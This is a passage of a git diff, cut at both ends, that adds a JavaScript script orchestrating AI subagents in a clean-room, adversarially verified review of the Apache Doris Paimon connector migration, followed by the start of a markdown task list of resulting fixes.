(all logic in fe-core under datasource/paimon/) to a NEW design with two parts:', + ' (a) a standalone connector module fe/fe-connector/fe-connector-paimon/ implementing a connector SPI defined in fe/fe-connector/fe-connector-api/. This module MUST NOT import fe-core classes.', + ' (b) a generic bridge layer in fe-core: fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDriven*.java, adapting Doris catalog/scan/MTMV/MVCC framework to the connector SPI.', + '- The legacy paimon code still exists in the working tree (not yet deleted), so you can read both sides directly.', +].join('\n') + +const LEGACY_NOTE = [ + 'Accessing legacy behavior:', + '- Paimon-specific legacy files under fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/ are present in the working tree — read them directly.', + '- Some SHARED/dispatch fe-core files were modified by this migration (e.g. Env.java, CatalogFactory.java, ShowPartitionsCommand.java, GsonUtils.java, UserAuthentication.java, PhysicalPlanTranslator.java, CreateTableInfo.java). To see their PRE-migration behavior run: `git show ' + BASELINE + ':` (' + BASELINE + ' is the legacy baseline commit; its production code == pre-migration).', +].join('\n') + +const TASK = [ + 'Your task:', + '1. Trace the NEW implementation\'s complete flow for this functional path (entry point -> end), reading the real code.', + '2. Trace the LEGACY implementation\'s complete flow for the same path.', + '3. Compare precisely: behavior, semantics, boundary/edge cases, error surfaces (exception types/messages), default values, ordering, time-zone handling, null handling, pushdown correctness, etc.', + '4. For every new-vs-legacy difference decide: intentional/benign reduction, or unintentional regression / bug?', + '', + 'Report ONLY real problems demonstrable from actual code: design flaws, implementation bugs, or parity regressions vs legacy. For each finding give: title; severity; newLocation (file:line); legacyLocation (file:line or "N/A"); difference (concrete new-vs-legacy behavioral difference); failureScenario (concrete trigger: input/query -> observed wrong output or exception); suggestion (concrete fix direction).', + '', + 'If an area is correct/clean, say so in coverageSummary and cleanAreas. Do NOT invent problems — only report what real code demonstrates. Prefer a few solid findings over many speculative ones.', + '', + 'Discipline: review-only. Do NOT modify any production code. Do NOT run git checkout/restore/stash/reset. Do NOT commit.', +].join('\n') + +const SEVERITY = [ + 'Severity rubric:', + '- BLOCKER: wrong query results, data loss / missing rows, crash on a reachable path, or credential/security leak.', + '- MAJOR: a real correctness bug on some inputs, or a significant parity regression vs legacy.', + '- MINOR: limited-impact bug or behavioral divergence unlikely to cause wrong results.', + '- NIT: cosmetic / style only.', +].join('\n') + +const LENSES = [ + { name: 'new-code-correctness', instruction: 'Focus on the NEW code path. Does it actually behave the way the finding claims (does the claimed wrong behavior really happen)? Trace the new code precisely, including guards, callers, and preconditions.' }, + { name: 'legacy-parity', instruction: 'Focus on the LEGACY code path. Does legacy actually behave differently from the new code as claimed? Trace legacy precisely and confirm the divergence is real (or whether legacy did the same thing).' }, + { name: 'reproducibility', instruction: 'Focus on end-to-end reachability. Can the claimed failure scenario actually be triggered through real entry points? Check whether guards, validation, config defaults, or callers prevent it (which would make it non-reproducible).' }, +] + +function ptr(arr) { return arr.map(p => ' - ' + p).join('\n') } + +function reviewPrompt(spec) { + return [ + CLEANROOM, '', ARCH, '', + '# Review unit: ' + spec.name, '', + '## Functional path to review', spec.description, '', + '## NEW implementation — starting file pointers (navigation only; explore further as needed)', + ptr(spec.newPointers), '', + '## LEGACY implementation — starting file pointers', + ptr(spec.legacyPointers), + spec.extra ? ('\n## Additional navigation hints\n' + spec.extra) : '', + '', LEGACY_NOTE, '', TASK, '', SEVERITY, + '', 'Set pathName in your output to: ' + spec.name, + ].join('\n') +} + +function refutePrompt(f, contextName, lens) { + return [ + CLEANROOM, '', ARCH, '', + '# Adversarial verification', + 'An independent reviewer raised the following finding about the paimon connector migration (functional area: ' + contextName + '). Verify it FIRSTHAND from the actual code and decide whether it is a REAL defect.', + '', + '## Finding under review', + '- title: ' + f.title, + '- severity (claimed): ' + f.severity, + '- newLocation: ' + f.newLocation, + '- legacyLocation: ' + (f.legacyLocation || 'N/A'), + '- difference (claimed): ' + f.difference, + '- failureScenario (claimed): ' + f.failureScenario, + '', + '## Your verification lens: ' + lens.name, + lens.instruction, + '', + LEGACY_NOTE, + '', + 'Read the real code at the cited (and surrounding) locations and trace actual behavior. Do NOT trust the finding\'s claims — independently confirm or refute each. If you cannot demonstrate the defect firsthand from the code, answer REFUTED. If partially right (real divergence but wrong severity/impact, or only under conditions that do not hold), answer PARTIAL and explain.', + '', + 'Output: verdict (CONFIRMED = real defect as described; REFUTED = not a real defect / claim wrong; PARTIAL = partly real), reasoning, evidence (firsthand file:line references).', + '', + 'Discipline: review-only; do NOT modify code, do NOT run git checkout/restore/stash/reset, do NOT commit.', + ].join('\n') +} + +function completenessPrompt(digest) { + return [ + CLEANROOM, '', ARCH, '', + '# Completeness critic', + 'A clean-room review covered the paimon connector migration across functional paths. Below is a digest of what each reviewer reported it covered, plus the titles of findings raised.', + '', + '## Coverage digest', + JSON.stringify(digest, null, 2), + '', + 'Your job: identify GAPS — functional paths, code paths, inputs, edge cases, or new-vs-legacy comparisons NOT covered or covered shallowly, that could hide a real defect or parity regression. For each gap give: area; why (what defect could hide there); suggestedReview (concretely what to trace, with file pointers).', + 'Be specific and code-grounded. Do not restate already-covered findings. If coverage is genuinely complete, return an empty gaps list and say so in assessment.', + ].join('\n') +} + +function supplementPrompt(gap) { + return [ + CLEANROOM, '', ARCH, '', + '# Supplemental targeted review', + 'A completeness critic flagged this as an under-covered area in the paimon connector migration. Investigate it firsthand.', + '', + '## Area', gap.area, + '## Why it matters', gap.why, + '## What to trace', gap.suggestedReview, + '', + 'New connector code: fe/fe-connector/fe-connector-paimon/ and fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDriven*.java. Legacy code: fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/.', + LEGACY_NOTE, '', TASK, '', SEVERITY, + '', 'Set pathName in your output to: ' + gap.area, + ].join('\n') +} + +function synthesisPrompt(payload) { + return [ + '# Final report synthesis (faithful formatting task)', + 'You are given the complete structured output of a clean-room adversarial review of the paimon connector migration: per-path findings, adversarial verification verdicts for each BLOCKER/MAJOR finding (3 lenses each), a completeness critic result, and supplemental findings.', + '', + 'Produce a faithful, well-organized Markdown report (Chinese section headers are fine; this team works in Chinese). Requirements:', + '- Title: "P5 paimon 全功能路径 clean-room 对抗 review — findings (2026-06-11)".', + '- Executive summary: counts of findings by severity; how many BLOCKER/MAJOR were CONFIRMED vs majority-REFUTED (downgraded) by the verify phase; the single highest-priority real defect.', + '- A per-path section for each review unit AND each supplemental area: list EVERY finding with severity, new file:line, legacy file:line, difference, failureScenario, suggestion, and (for BLOCKER/MAJOR) the verify verdict summary "CONFIRMED x / REFUTED y / PARTIAL z" across the 3 lenses, with a clear **DOWNGRADED** tag when majority-refuted.', + '- A consolidated "new <-> legacy 差异表" markdown table: path | difference | severity | verdict.', + '- A "仍走旧逻辑 / fallback 清单" section built from the cross-cutting fallback-sweep path.', + '- A "completeness / gaps" section summarizing the critic assessment.', + 'Be faithful: include ALL findings (do not drop or soften). Do not add new analysis or conclusions beyond what the data states. Clearly separate CONFIRMED real defects from DOWNGRADED (likely-not-real) ones.', + '', + '## Structured data (JSON)', + JSON.stringify(payload, null, 2), + '', + 'Output ONLY the Markdown report body, nothing else.', + ].join('\n') +} + +// ---------------------------------------------------------------------------- +// Schemas +// ---------------------------------------------------------------------------- +const FINDING_ITEM = { + type: 'object', + properties: { + title: { type: 'string' }, + severity: { type: 'string', enum: ['BLOCKER', 'MAJOR', 'MINOR', 'NIT'] }, + newLocation: { type: 'string' }, + legacyLocation: { type: 'string' }, + difference: { type: 'string' }, + failureScenario: { type: 'string' }, + suggestion: { type: 'string' }, + }, + required: ['title', 'severity', 'newLocation', 'difference', 'failureScenario', 'suggestion'], +} +const REVIEW_SCHEMA = { + type: 'object', + properties: { + pathName: { type: 'string' }, + coverageSummary: { type: 'string' }, + findings: { type: 'array', items: FINDING_ITEM }, + cleanAreas: { type: 'string' }, + }, + required: ['pathName', 'coverageSummary', 'findings', 'cleanAreas'], +} +const VERDICT_SCHEMA = { + type: 'object', + properties: { + verdict: { type: 'string', enum: ['CONFIRMED', 'REFUTED', 'PARTIAL'] }, + reasoning: { type: 'string' }, + evidence: { type: 'string' }, + }, + required: ['verdict', 'reasoning', 'evidence'], +} +const COMPLETENESS_SCHEMA = { + type: 'object', + properties: { + gaps: { + type: 'array', + items: { + type: 'object', + properties: { + area: { type: 'string' }, + why: { type: 'string' }, + suggestedReview: { type: 'string' }, + }, + required: ['area', 'why', 'suggestedReview'], + }, + }, + assessment: { type: 'string' }, + }, + required: ['gaps', 'assessment'], +} + +// ---------------------------------------------------------------------------- +// The 13 review units — neutral descriptions + bare file pointers only. +// ---------------------------------------------------------------------------- +const PATHS = [ + { + id: 'p01-normal-scan', + name: '1. 基础读取 (normal scan)', + description: 'Reading a normal paimon table: split generation, predicate/projection/limit/partition-prune pushdown, scan-node properties, JNI-vs-native execution selection, and row-count/value correctness.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (planScan, getScanNodeProperties, getTableHandle, getTableSchema)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java (splits, ReadBuilder, predicate/projection/limit pushdown)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonPredicateConverter.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableResolver.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSplit.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonScanNode.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonSource.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonSplit.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonValueConverter.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalTable.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonUtil.java', + ], + extra: 'Compare: split generation, predicate/projection/limit/partition-prune pushdown, scan-node properties, JNI-vs-native selection, row-count/value correctness. Note PluginDrivenScanNode getNodeExplainString and partition-count display vs the legacy FileScanNode behavior.', + }, + { + id: 'p02-incremental', + name: '2. 批式增量读取 (@incr)', + description: 'Batch incremental read via the @incr table-suffix syntax: incremental-between / -timestamp / -scan-mode keys, mutual exclusion with time-travel, parameter parsing/validation.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonIncrementalScanParams.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (incremental keys / scan options)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java (withScanOptions)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalTable.java (validateIncrementalReadParams and incremental handling)', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonScanNode.java (incremental scan)', + ], + extra: 'Compare every supported incremental key, defaults, validation/error messages, and interaction with time-travel (AS OF).', + }, + { + id: 'p03-time-travel', + name: '3. Time Travel (AS OF)', + description: 'AS OF time-travel reads: TIMESTAMP vs VERSION, numeric-vs-tag resolution, time-zone handling of TIMESTAMP, schema-at-snapshot, and not-found error surfaces.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (resolveTimeTravel / toTimeTravelSpec)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java (schemaAt / snapshot resolution)', + 'fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/mvcc/ConnectorTimeTravelSpec.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalTable.java (getSnapshotAt / getSnapshotById and time-travel)', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonSnapshot.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonMvccSnapshot.java', + ], + extra: 'TIME-ZONE is a key risk: confirm TIMESTAMP literal -> epoch conversion uses the same zone as legacy (a wrong zone yields the wrong snapshot = silently wrong rows). Compare numeric-vs-tag disambiguation and not-found error messages.', + }, + { + id: 'p04-branch-tag', + name: '4. Branch / Tag 读取', + description: 'Reading a specific branch or tag: branch-as-handle identity, tag pinning, and whether a branch carries its own schema/snapshot.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (tag/branch resolution via Identifier)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java (branchName)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java (branchExists / tagManager)', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalTable.java (branch/tag handling)', + ], + extra: 'Compare how a branch identifier is threaded into table loading and split planning, tag pinning to a snapshot id, and per-branch schema resolution.', + }, + { + id: 'p05-system-tables', + name: '5. 系统表查询 ($snapshots/$schemas/$partitions...)', + description: 'Querying paimon system tables ($snapshots, $schemas, $partitions, $files, binlog, audit_log, ...): enumeration/routing, JNI forcing for binlog/audit_log, auth unwrap, and TTableType selection for normal-table vs sys-table descriptors.', + newPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSysExternalTable.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (isSystemTable / system-table loading / sys handle)', + 'search fe-core for: SysTableResolver, NativeSysTable, buildTableDescriptor', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonSysExternalTable.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalTable.java (system-table paths)', + ], + extra: 'Compare sys-table enumeration/routing, the JNI-force for binlog/audit_log, auth unwrap of the sys-table handle, and the TTableType chosen by buildTableDescriptor for normal tables vs sys tables.', + }, + { + id: 'p06-metadata-cache', + name: '6. 元数据缓存', + description: 'Metadata caching: schema / snapshot / table caches, whether REFRESH CATALOG / REFRESH TABLE reach the connector (i.e. invalidation is not silently dropped), cache-key correctness, and cache granularity/consistency.', + newPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSchemaCacheValue.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java', + 'search fe-core for: ExternalSchemaCache, ExternalMetaCacheMgr, and any invalidateTable / invalidate SPI hook', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalMetaCache.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonSchemaCacheKey.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonSchemaCacheValue.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonSnapshotCacheValue.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonTableCacheValue.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonMetadataOps.java', + ], + extra: 'Key risk: does REFRESH CATALOG/TABLE actually invalidate the connector-side caches, or is stale schema/snapshot served after a refresh? Compare cache-key composition and what gets cached at which layer.', + }, + { + id: 'p07-deletion-vector', + name: '7. Deletion Vector 读取', + description: 'Deletion-vector reads: whether DV is correctly enabled and applied on the new scan path, row-deletion semantics, and BE/JNI coordination.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java (ReadBuilder / scan options / DV enable/read — locate yourself)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanRange.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonScanNode.java (DV handling)', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonSplit.java', + ], + extra: 'Grep both new and legacy for "deletionVector" / "DeletionFile" / "dropDelete" / "withDeletion" etc. Confirm DV files are propagated to BE the same way (a dropped DV = wrong results: deleted rows reappear).', + }, + { + id: 'p08-metastore-flavors', + name: '8. 多元数据服务接入 (HMS/DLF/REST/Filesystem/JDBC)', + description: 'Per-metastore catalog creation across HMS / DLF / REST / Filesystem / JDBC: option assembly, authentication (Kerberos for HMS, DLF creds, REST vended credentials), and cross-classloader metastore-client use.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java (buildCatalogOptions / validate)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/AbstractPaimonProperties.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonHMSMetaStoreProperties.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonAliyunDLFMetaStoreProperties.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonRestMetaStoreProperties.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonFileSystemMetaStoreProperties.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonJdbcMetaStoreProperties.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/PaimonPropertiesFactory.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalCatalogFactory.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalCatalog.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonHMSExternalCatalog.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonDLFExternalCatalog.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonRestExternalCatalog.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonFileExternalCatalog.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonVendedCredentialsProvider.java', + ], + extra: 'For EACH flavor compare catalog-option assembly and the auth path. REST vended-credentials and DLF/HMS Kerberos are high-risk for silent breakage. Note that the property/metastore/Paimon* classes are still live in fe-core — confirm who calls them in the new path.', + }, + { + id: 'p09-storage-systems', + name: '9. 多存储系统接入 (S3/OSS/HDFS...)', + description: 'Storage backends (S3 / OSS / HDFS / ...): how storage options/credentials are propagated into the paimon Configuration/FileIO, and per-cloud differences.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorProperties.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java (Configuration / catalog options / FileIO)', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalCatalog.java (fs / storage configuration)', + ], + extra: 'Compare storage-option propagation and credential flow per cloud. The connector module cannot import fe-core StorageProperties — check how the Configuration is rebuilt and whether any option is dropped vs legacy.', + }, + { + id: 'p10-type-mapping', + name: '10. 列类型映射', + description: 'Column type mapping in both directions: paimon type -> Doris type (read) and Doris type -> paimon type (DDL). Nullability, precision/scale, and complex types (array/map/row/struct), byte-for-byte parity.', + newPointers: [ + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTypeMapping.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (mapFields)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaBuilder.java (DDL toPaimonType)', + 'search fe-core for: ConnectorColumnConverter (connector column -> Doris Column)', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonUtil.java (type mapping)', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/DorisToPaimonTypeVisitor.java', + ], + extra: 'Go type-by-type. Check nullable propagation, decimal precision/scale, timestamp/time precision, char/varchar length, and nested complex types. Any mismatch can mean wrong values or DDL that creates a wrong schema.', + }, + { + id: 'p11-mtmv', + name: '11. mtmv', + description: 'MTMV (materialized view) base-table support: partition tracking, incremental-refresh snapshot feed, and partition-spec exposure.', + newPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java (MTMVRelatedTableIf / MTMVBaseTableIf)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (partition / snapshot feed)', + 'fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPartitionInfo.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalTable.java (MTMV methods)', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonPartitionInfo.java', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonPartition.java', + ], + extra: 'Compare MTMV base-table refresh: partition tracking, how snapshot is fed for incremental refresh, and partition-spec/partition-name rendering (a wrong partition name = missing/duplicated refresh rows).', + }, + { + id: 'p12-mvcc', + name: '12. mvcc', + description: 'MVCC snapshot isolation: query-begin snapshot pinning, consistency, and crucially whether the pinned snapshot actually reaches split planning.', + newPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccExternalTable.java (MvccTable)', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenMvccSnapshot.java', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java (beginQuerySnapshot / snapshot pin)', + 'fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonTableHandle.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonExternalTable.java (MvccTable)', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonMvccSnapshot.java', + ], + extra: 'Key risk: trace the pinned query-begin snapshot all the way into planScan/split planning. If split planning re-resolves "latest" instead of using the pinned snapshot, concurrent writes cause inconsistent reads.', + }, + { + id: 'p13-fallback-sweep', + name: '13. cross-cutting: 旧逻辑/fallback sweep', + description: 'Whole-tree sweep for residual legacy paimon logic still reachable after the cutover (potential bugs) vs dead code (safe to delete later).', + newPointers: [ + 'grep the WHOLE fe/ tree for: "instanceof Paimon", "PAIMON_EXTERNAL_TABLE", "case PAIMON", "MetastoreProperties.Type.PAIMON", "PaimonExternalCatalog", "PaimonExternalTable"', + 'fe/fe-core/src/main/java/org/apache/doris/datasource/CatalogFactory.java', + 'fe/fe-core/src/main/java/org/apache/doris/catalog/Env.java', + 'fe/fe-core/src/main/java/org/apache/doris/nereids/rules/analysis/UserAuthentication.java', + 'fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/ShowPartitionsCommand.java', + ], + legacyPointers: [ + 'fe/fe-core/src/main/java/org/apache/doris/datasource/property/metastore/ (still-live Paimon* classes)', + 'use `git show ' + BASELINE + ':` to compare pre-cutover dispatch', + ], + extra: 'For EACH match decide: (a) post-cutover DEAD code (the catalog/table is never the legacy type anymore -> safe to delete) or (b) STILL-REACHABLE legacy logic / fallback (a real path can still hit it -> potential bug). Pay special attention to scan / cache / auth / DDL dispatch and the property/metastore/Paimon* classes that remain live. Report any reachable fallback that would behave differently from the new connector.', + }, +] + +// ---------------------------------------------------------------------------- +// Verify helper: 3 adversarial refuters (3 lenses) per BLOCKER/MAJOR finding. +// ---------------------------------------------------------------------------- +async function verifyFindings(review, contextName, idPrefix) { + if (!review || !Array.isArray(review.findings)) return [] + const toVerify = review.findings.filter(f => f.severity === 'BLOCKER' || f.severity === 'MAJOR') + if (!toVerify.length) return [] + const flat = await parallel(toVerify.flatMap((f, fi) => + LENSES.map(lens => () => + agent(refutePrompt(f, contextName, lens), { label: 'verify:' + idPrefix + ':f' + fi + ':' + lens.name, phase: 'Verify', schema: VERDICT_SCHEMA }) + .then(v => v ? { fi, lens: lens.name, verdict: v.verdict, reasoning: v.reasoning, evidence: v.evidence } : null) + ) + )) + const byFinding = {} + for (const v of flat.filter(Boolean)) (byFinding[v.fi] = byFinding[v.fi] || []).push(v) + return toVerify.map((f, fi) => { + const vs = byFinding[fi] || [] + const refuted = vs.filter(v => v.verdict === 'REFUTED').length + const confirmed = vs.filter(v => v.verdict === 'CONFIRMED').length + const partial = vs.filter(v => v.verdict === 'PARTIAL').length + return { finding: f, verdicts: vs, confirmedCount: confirmed, refutedCount: refuted, partialCount: partial, majorityRefuted: vs.length > 0 && refuted > vs.length / 2 } + }) +} + +// ---------------------------------------------------------------------------- +// Phase Review + Verify (pipeline: each path verifies as soon as it is reviewed) +// ---------------------------------------------------------------------------- +phase('Review') +log('Clean-room review: ' + PATHS.length + ' functional paths, fresh subagent each, neutral prompts only.') +const reviewed = await pipeline( + PATHS, + (spec) => agent(reviewPrompt(spec), { label: 'review:' + spec.id, phase: 'Review', schema: REVIEW_SCHEMA }), + async (review, spec) => ({ + id: spec.id, + pathName: spec.name, + review, + verdicts: await verifyFindings(review, spec.name, spec.id), + }) +) + +// ---------------------------------------------------------------------------- +// Phase Completeness (critic over the coverage digest) +// ---------------------------------------------------------------------------- +phase('Completeness') +const digest = reviewed.filter(Boolean).map(r => ({ + path: r.pathName, + coverage: r.review ? r.review.coverageSummary : '(reviewer failed)', + cleanAreas: r.review ? r.review.cleanAreas : '', + findings: r.review && Array.isArray(r.review.findings) ? r.review.findings.map(f => '[' + f.severity + '] ' + f.title) : [], +})) +const completeness = await agent(completenessPrompt(digest), { label: 'completeness-critic', phase: 'Completeness', schema: COMPLETENESS_SCHEMA }) + +// ---------------------------------------------------------------------------- +// Phase Supplemental (targeted review of each gap, then verify) +// ---------------------------------------------------------------------------- +phase('Supplemental') +const gaps = (completeness && Array.isArray(completeness.gaps)) ? completeness.gaps.slice(0, 8) : [] +log('Completeness critic flagged ' + gaps.length + ' gap(s) for supplemental review.') +const supplemental = await pipeline( + gaps, + (gap) => agent(supplementPrompt(gap), { label: 'supp:' + gap.area.slice(0, 24), phase: 'Supplemental', schema: REVIEW_SCHEMA }), + async (review, gap, i) => ({ + area: gap.area, + review, + verdicts: await verifyFindings(review, gap.area, 'supp' + i), + }) +) + +// ---------------------------------------------------------------------------- +// Phase Synthesis (faithful markdown report) +// ---------------------------------------------------------------------------- +phase('Synthesis') +const payload = { + reviewed: reviewed.filter(Boolean), + completeness, + supplemental: supplemental.filter(Boolean), +} +const markdown = await agent(synthesisPrompt(payload), { label: 'synthesis', phase: 'Synthesis' }) + +return { markdown, raw: payload } diff --git a/plan-doc/task-list-P5-paimon-fixes.md b/plan-doc/task-list-P5-paimon-fixes.md new file mode 100644 index 00000000000000..c14f2d96df18b4 --- /dev/null +++ b/plan-doc/task-list-P5-paimon-fixes.md @@ -0,0 +1,26 @@ +# Task List — P5 paimon fullpath-review fixes (2026-06-11) + +> Source: `plan-doc/reviews/P5-paimon-fullpath-review-2026-06-11.md`. +> Scope = user-selected "BLOCKERs + key MAJORs". +> **Commits HELD** (project rule: no commit unless asked; B7 uncommitted in tree). Implement + test + document each; present grouped diffs at end. +> Per fix: design doc `plan-doc/tasks/designs/P5-fix--design.md` → impl → build+UT → summary. + +## Progress + +| # | id | sev | area / file(s) | design | impl | build+UT | status | +|---|----|-----|----------------|--------|------|----------|--------| +| 1 | FIX-STORAGE-CREDS | BLOCKER×2 | PaimonConnectorProperties / applyStorageConfig (s3/oss canonical keys + DLF OSS) | ✅ | ✅ | ✅ (38/0) | ✅ | +| 2 | FIX-REST-VENDED | BLOCKER | SPI vendStorageCredentials + scan-props overlay (REST vended creds → BE) | ✅ | ✅ | ✅ (conn 15/0; fe-core 2/0) | ✅ | +| 3 | FIX-NATIVE-PARTVAL | BLOCKER+MAJOR | PaimonScanPlanProvider (port serializePartitionValue: DATE/LTZ/TIME/BINARY/float + session TZ) | ✅ | ✅ | ✅ (7/0) | ✅ | +| 4 | FIX-CPP-READER | BLOCKER | scan plan / split serialization (enable_paimon_cpp_reader) | ✅ | ✅ | ✅ (12/0) | ✅ | +| 5 | FIX-TZ-ALIAS | MAJOR | PaimonConnectorMetadata (full SHORT_IDS+4 tz alias map) | ✅ | ✅ | ✅ (37/0) | ✅ | +| 6 | FIX-HMS-CONFRES | MAJOR | SPI loadHiveConfResources + buildHmsHiveConf overlay (hive.conf.resources) | ✅ | ✅ | ✅ (42/0 conn; fe-core compiles) | ✅ | +| 7 | FIX-TABLE-STATS | MAJOR | 